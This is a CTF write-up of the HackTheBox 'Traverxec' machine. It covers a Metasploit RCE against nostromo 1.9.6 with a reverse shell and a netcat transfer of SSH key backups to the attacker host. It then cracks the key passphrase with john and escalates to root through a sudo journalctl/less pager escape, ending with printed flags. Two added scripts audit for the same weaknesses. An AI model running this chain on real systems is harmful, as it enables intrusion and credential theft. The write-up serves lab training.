

HackTheBox Traverxec write-up: getting root by solving this CTF machine. Let's see what we learn on the way to the root # shell. The machine is tagged web and file misconfiguration and is rated Easy on the HTB platform.
The initial nmap scan reveals two open ports, 22 and 80, on which we then run a more comprehensive scan.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ nmap -p- --min-rate=1000 -T5 10.10.10.165
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:29 IST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.17s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 128.36 seconds

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ sudo nmap -p22,80 -sV -sC -A -O -oN traverxec traverxec.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 23:35 IST
Nmap scan report for traverxec.htb (10.10.10.165)
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 5.1 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   345.11 ms 10.10.14.1
2   345.25 ms traverxec.htb (10.10.10.165)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.23 seconds
The scan shows the machine running the nostromo HTTP server 1.9.6 on port 80, serving a web page titled TRAVERXEC.
A quick search for just the name and version reveals that a public RCE exploit exists for it.
However, I went to Metasploit, which also has a module when you search for nostromo.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ msfconsole
       =[ metasploit v6.0.53-dev                          ]
+ -- --=[ 2149 exploits - 1143 auxiliary - 366 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: View missing module options with show missing

msf6 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf6 exploit(multi/http/nostromo_code_exec) > set rhosts traverxec.htb
rhosts => traverxec.htb
msf6 exploit(multi/http/nostromo_code_exec) > set lhost tun0
lhost => 10.10.14.8
msf6 exploit(multi/http/nostromo_code_exec) > set lport 7777
lport => 7777
msf6 exploit(multi/http/nostromo_code_exec) > show options

Module options (exploit/multi/http/nostromo_code_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   traverxec.htb    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.8       yes       The listen address (an interface may be specified)
   LPORT  7777             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf6 exploit(multi/http/nostromo_code_exec) >
Let's run the exploit now to see the magic, and then upgrade to a TTY shell with python's pty module.
msf6 exploit(multi/http/nostromo_code_exec) > run

[*] Started reverse TCP handler on 10.10.14.8:7777
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 2 opened (10.10.14.8:7777 -> 10.10.10.165:44536) at 2021-07-28 00:38:33 +0530

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$
Let's find out more and do some enumeration, starting with the non-system users on the box.
www-data@traverxec:/usr/bin$ awk -F: '($3>=1000)&&($1!="nobody"){print $1}' /etc/passwd
david
www-data@traverxec:/usr/bin$
Further enumeration of /var/nostromo turns up the config file nhttpd.conf, which tells us the admin username and the path of the htpasswd file that holds a password hash.
www-data@traverxec:/usr/bin$ cd /var
www-data@traverxec:/var$ ls
backups  cache  lib  local  lock  log  mail  nostromo  opt  run  spool  tmp
www-data@traverxec:/var$ cd nostromo
www-data@traverxec:/var/nostromo$ ls
conf  htdocs  icons  logs
www-data@traverxec:/var/nostromo$ cd conf
www-data@traverxec:/var/nostromo/conf$ ls
mimes  nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
www-data@traverxec:/var/nostromo/conf$
www-data@traverxec:/var/nostromo/conf$ cat /var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
www-data@traverxec:/var/nostromo/conf$
The nhttpd.conf file also has a HOMEDIRS section, which tells us that user home directories are served over HTTP from a public_www subdirectory. Let's dig into these directories.
# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
/home/david itself cannot be listed (mode drwx--x--x, so it is only traversable), but the public_www directory inside it is world-readable, including a protected-file-area holding a backup of SSH identity files.
www-data@traverxec:/var/nostromo/conf$ ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 Oct 25  2019 .
drwxr-xr-x 18 root  root  4096 Oct 25  2019 ..
drwx--x--x  5 david david 4096 Oct 25  2019 david
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/
ls: cannot open directory '/home/david/': Permission denied
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www
total 16
drwxr-xr-x 3 david david 4096 Oct 25  2019 .
drwx--x--x 5 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david  402 Oct 25  2019 index.html
drwxr-xr-x 2 david david 4096 Oct 25  2019 protected-file-area
www-data@traverxec:/var/nostromo/conf$ ls -la /home/david/public_www/protected-file-area
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz
www-data@traverxec:/var/nostromo/conf$
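As an added defender-side check (not part of the original write-up or of nostromo itself), the POSIX shell script below reads homedirs and homedirs_public from an nhttpd.conf and lists world-readable files under each user's public directory whose names look like keys, backups or password files; the conf path and the file-name patterns are assumptions.

```shell
#!/bin/sh
# Added defender-side audit, not part of nostromo or of the original write-up.
# nostromo's "homedirs" feature serves <homedirs>/<user>/<homedirs_public> over
# HTTP, and because nhttpd runs as www-data those files must be readable by
# that user; a .htaccess only guards the HTTP path, not the filesystem. This
# script finds credential- or backup-looking files exposed that way.

# Print the value of a key from nhttpd.conf (key and value are whitespace
# separated; comment lines start with '#' and never match a key).
conf_value() {                # $1 = path to nhttpd.conf, $2 = key name
    awk -v k="$2" '$1 == k { print $2; exit }' "$1"
}

# List world-readable files under every user's public directory whose name
# matches a sensitive pattern (patterns are an assumption, extend as needed).
# Returns 1 if anything was found, 0 if the homedirs setup looks clean.
find_exposed_secrets() {      # $1 = path to nhttpd.conf
    homedirs=$(conf_value "$1" homedirs)
    pubdir=$(conf_value "$1" homedirs_public)
    # Feature disabled: nothing to audit.
    [ -n "$homedirs" ] && [ -n "$pubdir" ] || return 0
    found=0
    for userdir in "$homedirs"/*/; do
        pub="${userdir}${pubdir}"
        [ -d "$pub" ] || continue
        # -perm -o=r selects files carrying the world-read bit.
        hits=$(find "$pub" -type f -perm -o=r \( -name 'id_rsa*' -o -name 'id_dsa*' \
                 -o -name 'id_ed25519*' -o -name '*.pem' -o -name '*.tgz' \
                 -o -name '*.tar*' -o -name '*backup*' -o -name '.htpasswd' \))
        if [ -n "$hits" ]; then
            printf 'EXPOSED under %s:\n%s\n' "$pub" "$hits"
            found=1
        fi
    done
    return $found
}
```

Run it as `find_exposed_secrets /var/nostromo/conf/nhttpd.conf`; on this box it would report the backup-ssh-identity-files.tgz archive, which the `.htaccess` next to it does nothing to protect from a local user.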
Transfer the archive to the attacking machine with netcat.
www-data@traverxec:/var/nostromo/conf$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/var/nostromo/conf$ nc 10.10.14.8 9876 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ nc -lvp 9876 > backup.tgz
listening on [any] 9876 ...
connect to [10.10.14.8] from traverxec.htb [10.10.10.165] 60010

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ tar -xvf backup.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
We have a private key, which probably belongs to the david user. Let's try it.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ sudo chmod 400 id_rsa

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ ssh -i id_rsa david@traverxec.htb
The authenticity of host 'traverxec.htb (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
It then asks for a passphrase, so the key is encrypted. We extract a crackable hash from id_rsa with ssh2john and crack it with john.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ python /usr/share/john/ssh2john.py id_rsa > hash2.txt

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ john --wordlist=../rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:13 DONE (2021-07-28 01:24) 0.07183g/s 1030Kp/s 1030Kc/s 1030KC/s a6_123..*7¡Vamos!
Session completed

┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ john --show hash2.txt
id_rsa:hunter

1 password hash cracked, 0 left
Enter the passphrase hunter when ssh-ing to david@traverxec.htb and we are in.
┌──(abhinav㉿ETHICALHACKX)-[~/htb/traverxec]
└─$ ssh -i id_rsa david@traverxec.htb
Enter passphrase for key 'id_rsa':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
david@traverxec:~$
We are at a sweet spot now; grab the user flag from user.txt.
david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
david@traverxec:~$
Privilege Escalation
We see an interesting directory, bin, in david's home, containing a script with the following content.
david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
david@traverxec:~/bin$
The last line of the script executes journalctl with sudo, which is interesting. Let's run the script and see what it does.
david@traverxec:~/bin$ ./server-stats.sh
[server-stats.head ASCII art banner: "Webserver Statistics and Data Collection Script (c) David, 2019"]

Load: 16:06:03 up 2:14, 1 user, load average: 0.00, 0.00, 0.00

Open nhttpd sockets: 0
Files in the docroot: 117

Last 5 journal log lines:
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:06:03 EDT. --
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start: No such file or directory
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040 (max)
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
david@traverxec:~/bin$
We move to GTFOBins to see whether there is anything interesting for journalctl, and there is.
journalctl hands its output to the default pager, less, whenever that output does not fit the terminal. less then waits for user input, and because it was started by a command running under sudo, it runs as root and can be abused to spawn a shell.
Let us execute: /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
[ DO NOT EXECUTE WHEN THE TERMINAL IS MAXIMIZED; make the terminal window small, so that the output overflows the screen and journalctl actually invokes the pager ]
As soon as we run this, less is waiting for input, where we enter !/bin/bash, and voilà, we have a root shell.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
lines 1-6/6 (END)

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2021-07-27 13:51:42 EDT, end at Tue 2021-07-27 16:41:32 EDT
Jul 27 13:51:44 traverxec systemd[1]: Starting nostromo nhttpd server...
Jul 27 13:51:44 traverxec systemd[1]: nostromo.service: Can't open PID file /var
Jul 27 13:51:44 traverxec nhttpd[420]: started
Jul 27 13:51:44 traverxec nhttpd[420]: max. file descriptors = 1040 (cur) / 1040
Jul 27 13:51:44 traverxec systemd[1]: Started nostromo nhttpd server.
!/bin/bash
root@traverxec:/home/david/bin#
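As an added defender-side check, not part of the original write-up, the POSIX shell functions below flag journalctl invocations (in a script such as server-stats.sh, or in a sudoers command spec) that can still hand control to a pager: any call without --no-pager whose output is not piped into another command. The audited file path and the hardened sudoers line in the comments are assumptions, since the box's sudoers is not shown.

```shell
#!/bin/sh
# Added defender-side audit for the journalctl/less pager escape shown above.
# journalctl pipes its output through a pager (less by default) when stdout is
# a terminal and the output overflows the screen; under sudo that pager runs as
# root, and less's "!" command then gives a root shell. Exporting
# SYSTEMD_PAGER=cat in the caller's environment does not help: sudo resets the
# environment by default, so only the command line itself can be trusted.

# Return 0 (true) if the command line may hand control to a pager, 1 otherwise.
journalctl_pages() {          # $1 = a single command line
    case "$1" in
        *journalctl*) ;;      # only journalctl invocations are of interest
        *) return 1 ;;
    esac
    case "$1" in
        *--no-pager*) return 1 ;;           # pager explicitly disabled
        *journalctl*'|'*) return 1 ;;       # stdout is a pipe, not a tty
    esac
    return 0
}

# Scan a script (or a sudoers fragment) line by line and print each risky line.
# Returns 1 if at least one risky journalctl call was found, 0 otherwise.
audit_pager_lines() {         # $1 = path to the file to audit
    rc=0
    while IFS= read -r line || [ -n "$line" ]; do
        if journalctl_pages "$line"; then
            printf 'PAGER RISK: %s\n' "$line"
            rc=1
        fi
    done < "$1"
    return $rc
}

# A hardened sudoers grant (assumption, the box's sudoers is not in the
# write-up) pins the exact arguments and disables the pager, for example:
#   david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
# Adding the NOEXEC: tag additionally stops a pager from executing a shell.
```

Note that server-stats.sh itself passes the audit because it pipes into /usr/bin/cat; the risk is that the sudo grant allows the same journalctl command to be run without that pipe.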
Root Flag.
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:~#
Exploitation completed and flags found. What we learnt so far:
– be versed with netcat: listening and transferring files
– enumeration is the key
– nmap to see open ports
– Metasploit and the exploit-db database (or searchsploit) to search for exploits
– spawn TTY shells where possible
– search well for known services and read their documentation (here, nostromo)
– never ignore SSH keys (id_rsa)
– getting the passphrase from an encrypted id_rsa (ssh2john)
– using john or online resources to crack or look up hashes
– privilege escalation via journalctl/less to root